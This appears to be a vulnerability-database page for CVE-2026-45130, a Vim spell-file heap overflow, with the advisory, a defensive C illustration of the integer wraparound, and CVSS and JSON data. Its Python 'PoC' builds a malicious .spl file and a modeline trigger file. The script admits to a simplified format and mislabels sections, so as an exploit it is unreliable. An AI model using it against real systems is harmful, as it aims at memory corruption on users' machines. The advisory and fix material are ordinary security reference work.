Security Vulnerability Report
CVE-2026-45130 CVSS 6.6 MEDIUM

Published: 2026-05-08 23:16:40
Last Modified: 2026-05-08 23:16:40

Description

Vim is an open source, command line text editor. Prior to version 9.2.0450, a heap buffer overflow exists in read_compound() in src/spellfile.c when loading a crafted spell file (.spl) with UTF-8 encoding active. An attacker-controlled length field in the spell file's compound section overflows a 32-bit signed integer multiplication, causing a small buffer to be allocated for a write loop that runs many iterations, overflowing the heap. Because the 'spelllang' option can be set from a modeline, a text file modeline can trigger spell file loading if a malicious .spl file has been planted on the runtimepath. This issue has been patched in version 9.2.0450.
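
The arithmetic failure described above, shown as an added illustration that is not Vim's source code and not part of the original report. The names `wrapped_size` and `checked_size`, the factor `BYTES_PER_ITEM`, the overhead `FIXED_OVERHEAD` and the sample length are assumptions chosen to show how a wrapped 32-bit size becomes a tiny allocation, next to a check that rejects the length before any arithmetic.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical expansion factor and fixed overhead, chosen for illustration. */
#define BYTES_PER_ITEM 4
#define FIXED_OVERHEAD 8

/* Value a 32-bit "len * BYTES_PER_ITEM + FIXED_OVERHEAD" holds after wrapping.
 * Done in 64 bits and truncated so this demonstration has no undefined behaviour. */
int32_t wrapped_size(int32_t len)
{
    int64_t wide = (int64_t)len * BYTES_PER_ITEM + FIXED_OVERHEAD;
    return (int32_t)(uint32_t)wide;
}

/* Hardened form: validate the untrusted length before any arithmetic.
 * remaining = bytes still unread in the section being parsed.
 * Returns 0 and sets *out on success, -1 if the length must be rejected. */
int checked_size(int32_t len, size_t remaining, size_t *out)
{
    if (len < 0 || (size_t)len > remaining)
        return -1;                       /* negative, or more items than input */
    if (len > (INT32_MAX - FIXED_OVERHEAD) / BYTES_PER_ITEM)
        return -1;                       /* product would not fit in 32 bits */
    *out = (size_t)len * BYTES_PER_ITEM + FIXED_OVERHEAD;
    return 0;
}

int main(void)
{
    int32_t len = 0x40000000;            /* constructed sample length field */
    size_t n = 0;
    printf("wrapped size for %d items: %d bytes\n", (int)len, (int)wrapped_size(len));
    printf("checked_size verdict: %d\n", checked_size(len, 100, &n));
    return 0;
}
```

A loop that trusts the original item count while the buffer was sized from the wrapped value writes far past the allocation, which is the condition the description reports.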

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Vim < 9.2.0450

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-45130
# This script generates a malicious .spl file and a text file with a modeline.
# The crafted .spl file attempts to trigger the integer overflow in read_compound().
import struct


def create_malicious_spl(filename):
    # Simplified SPL structure to trigger the vulnerability
    # In a real scenario, specific binary headers and offsets are required.
    # This attempts to set a large length field for the compound section.
    with open(filename, 'wb') as f:
        # SPL Header (magic bytes etc - simplified)
        f.write(b'VIMspell')
        # SN_REGION: Compound info section
        # The vulnerability occurs when calculating buffer size based on a length field here.
        # We inject a large value to cause integer overflow in multiplication.
        # Target calculation: len * sizeof(short) overflow.
        # Arbitrary large number to trigger overflow on 32-bit signed int
        evil_length = 0x10000000
        # Write section header (type, length)
        # Assuming section type for compound words
        f.write(struct.pack('<I', 1))  # Section type
        f.write(struct.pack('<I', evil_length))  # Evil length field
        # Padding data
        f.write(b'A' * 100)


def create_trigger_txt(filename, spl_filename):
    # Create a text file with a modeline that sets spelllang to the malicious file
    content = f"""Normal text content.
vim: set spelllang={spl_filename}:
"""
    with open(filename, 'w') as f:
        f.write(content)


if __name__ == "__main__":
    print(f"[+] Generating malicious spell file: evil.spl")
    create_malicious_spl('evil.spl')
    print(f"[+] Generating trigger text file: trigger.txt")
    create_trigger_txt('trigger.txt', 'evil.spl')
    print(f"[+] Done. Place 'evil.spl' in the runtimepath and open 'trigger.txt' with vulnerable Vim.")
```

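References

https://github.com/vim/vim/commit/92993329178cb1f72d700fff45ca86e1c2d369f8
https://github.com/vim/vim/releases/tag/v9.2.0450
https://github.com/vim/vim/security/advisories/GHSA-q4jv-r9gj-6cwv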

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45130", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:40.053", "lastModified": "2026-05-08T23:16:40.053", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.2.0450, a heap buffer overflow exists in read_compound() in src/spellfile.c when loading a crafted spell file (.spl) with UTF-8 encoding active. An attacker-controlled length field in the spell file's compound section overflows a 32-bit signed integer multiplication, causing a small buffer to be allocated for a write loop that runs many iterations, overflowing the heap. Because the 'spelllang' option can be set from a modeline, a text file modeline can trigger spell file loading if a malicious .spl file has been planted on the runtimepath. This issue has been patched in version 9.2.0450."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/vim/vim/commit/92993329178cb1f72d700fff45ca86e1c2d369f8", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/releases/tag/v9.2.0450", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-q4jv-r9gj-6cwv", "source": "[email protected]"}]}}